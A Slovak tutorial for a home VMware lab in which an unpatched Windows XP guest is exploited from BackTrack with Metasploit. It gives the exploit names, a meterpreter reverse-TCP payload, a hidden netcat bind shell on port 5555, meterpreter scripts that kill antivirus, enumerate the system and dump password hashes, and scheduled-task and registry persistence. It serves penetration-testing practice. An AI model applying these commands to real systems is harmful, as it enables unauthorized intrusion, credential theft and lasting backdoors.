Tréning dovedností exploitácie operačných systémov – VMware

meterpreter vmware metasploit Na stránkach AMP je niekoľko postupov a zmienok o virtuálnom stoji VMware Workstation ktorý emuluje prostredie a umožňuje inštalovat iné platfromy primo do hotového operačného systému. Šlo zvačša o virtualizáciu operačného systému BackTrack pod operačným systémom Windows. Nový kernel v BackTrack 4 beta resp. Pre-Final (2.6.29.4) dovoľuje po určitých úpravách otočiť tento proces a jednoducho tak testovať / analyzovať proces exploitácie ľubovoľných virtuálnych systémov s použitím VMware verzie 6.5.2.

Výhod je nesporne niekoľko:

- trénovanie a získavanie zručností bez potreby vlastniť viac ako jeden počítač
- reštart virtuálneho systému je otázkou minúty
- ľubovoľný počet virtuálnych operačných systémov

Cieľom tohto cvičenia bude exploitácia zraniteľností operačného systému Windows ,vytvorenie nového procesu v exploitovanom operačnom systéme, migrácia do novovytvoreného procesu, upload netcat.exe + netcat.bat, ukážka práce s meterpreter skriptami a úprava databázy Registry systému Windows za účelom vytvorenia permanentného backdoor-u. Ak by ste toto cvičenie chceli realizovať pod systémom Windows – VMware-emulovaný BackTrack – bude to ako pílenie konára na ktorom sedíte :)

Inštalácia VMware Workstation 6.5.2

sh VMWARE_WORKSTATION_6_5_2.BUNDL

Patch VMware 6.5.2

rmmod kvm_intel kvm
echo blacklist kvm >> /etc/modprobe.d/blacklist
cd /tmp
wget www.offensive-security.com/tools/bt4-vmware-workstation-patch.tar.bz2
tar jxpf bt4-vmware-workstation-patch.tar.bz2
chmod 755 vmware-6.5.2-modules-2.6.29-fix*
./vmware-6.5.2-modules-2.6.29-fix.sh
vmware-modconfig –console –install-all
vmware

Inštalácia viruálneho operačného systému je intuitívna, postačí Iso súbor + licenčný kľúč. (ak inštalujeme OS z rodiny Windows) Po spustení inštalovať VMware Tools.

instalace vmware ve windows xp

Osobne som si zvolil Windows XP Profesional, zľahka bez Service packu s plne aktualizovaným antivírusovým programom Panda Antivirus Pro 2009 a personálnym firewallom FortKnox 2009. Pre študijné učely ideál. Update na Service Pack 3 + skutočný antivírusový program až neskôr, až dozrie čas a vznikne určitý nadhľad.

windows xp vmware start

Exploitácia takéhoto neaktualizovaného operačného systému je záležitosťou troch minút. Antivírusový program a firewall ako keby ani neboli. Rovnako ako v článku Meterpreter keystroke sniffing využijeme Metasploit Framework 3.3 dev konkrétne msfconsole. Vyberieme „správny“ exploit (napr. ms03_026_dcom, ms03_049_netapi, ms06_040_netapi), payload volím obľúbený meterpreter reverse tcp.

ms03 netAPI

Netcat

Netcat je šikovná utilitka slúžiaca pre upload/download súborov,presmerovanie trafficu, banner grabing, port scanning atp. prostredníctvom TCP a UDP protokolu. Casto je označovaný ako „Swiss-army knife for TCP/IP“ Využijeme ho však ako dočasný backdoor, otvárajúci port 5555 na exploitovanom počítači.

1. pomocou payloadu Meterpreter uploadneme nc.exe do adresára c:\\WINDOWS\\system32\\
2. rovnakým spôsobom na rovnaké miesto uplaodneme pripravený súbor nc.bat s obsahom:

nc -L -d -p 5555 -t -e cmd.exe

Vysvetlivky

nc – spusť program nc.exe s nasledovými parametrami:
-L netcat čaká na spojenie
-p špecifikácia portu
-t netcat akceptuje telnet spojenie
-d skrytý režim
-e špecifikácia programu ktorý sa spustí po pripojení na vybraný port (cmd.exe)

Po spustení nc.bat sa otvára port 5555 akceptujúci netcat/telnet spojenia.

temp backdoor

Tieto zadné vrátka sú dočasné a zatvoria sa po reštartovaní cieľového počítača.

Meterpreter scripts

Vývojári payloadu Meterpreter mysleli skutočne na všetko, v skratke prehľad niektorých skriptov:

getcountermeasure.rb – skript vyhľadá antivírusový program inštalovaný v systéme rovnako ako informácie o prítomnom firewalle.

killav – skript sa snaží o kill procesu antivírusového programu, niekedy úspešne, inokedy nie v závislosti od softvéru. Napr. proces srvhost antivírusového programu NOD32 sa reštartuje automaticky po jeho kill-nutí. Viac o obchádzaní tohto procesu možno neskôr. Ide však o vec estetickú, kedže ako bolo popísané v článku meterpreter keystroke sniffing, je možné skryť payload meterpreter v tomto procese príkazom migrate bez najmenších problémov.

keylogrecorder.rb – obdoba keystroke sniffing, samostatne migruje do procesu prehliadača Internet Explorer. Nie príliš štastné miesto z môjho pohľadu, často odstaví spomínaný prehliadač.

meterpreter skripty

winenum – Windows Local Enumerion Meterpreter Script, skript vytvorí detailný report o exploitovamom systéme. Do textového suboru uloží zoznam inštalovaného softvéru, informácie o užívateľských profiloch, procesore, procesoch, netstat info, firewall info, routovacie tabuľky atd. Bonusom sú password hashes.

scheduleme – užitočný skript pre plánovaný/časovaný útok, multifunkčné použitie. (run scheduleme -h)

Permanentný backdoor

1. využijeme skript scheduleme a príkazom

run scheduleme -s -c c:\\WINDOWS\\system32\\nc.bat

zabezpečíme spúštanie súboru nc.bat pri štarte systému.
2. pomocou payloadu meterpreter príkazom reg upravíme Databázu Registry systému Windows čím zabezpečíme spustenie súboru nc.bat

Oba spôsoby otváraju predkonfigurovaný port zvolený v súbore nc.bat rovnako ako v prípade dočasného backdooru. Tretím spôsobom by hádam bolo uploadnuť predpripravený netcat.reg file na cieľový počítač a spustiť. Ďakujem starenke za pomoc s regedit.

meterpreter regedit

VMware má pre korektné fungovanie určité minimálne požiadavky, pri testovaní bol použitý notebook Toshiba A200 1GH (Intel® Core™ Duo T2450,1 GB DDR2 RAM) – operačný sysém BackTrack 4 Pre-Final, 1 GB swap. Vcelku spokojnosť. Pri pokusoch na postaršom počítači s procesorom AMD Sempron 2600+, 768 MB RAM som spozoroval značné obmedzenia zo strany VMware, nezdarila sa ani len migrácia do novovytvoreného procesu virtuálneho OS. Systém však bežal celkom dobre pre bežné činnosti.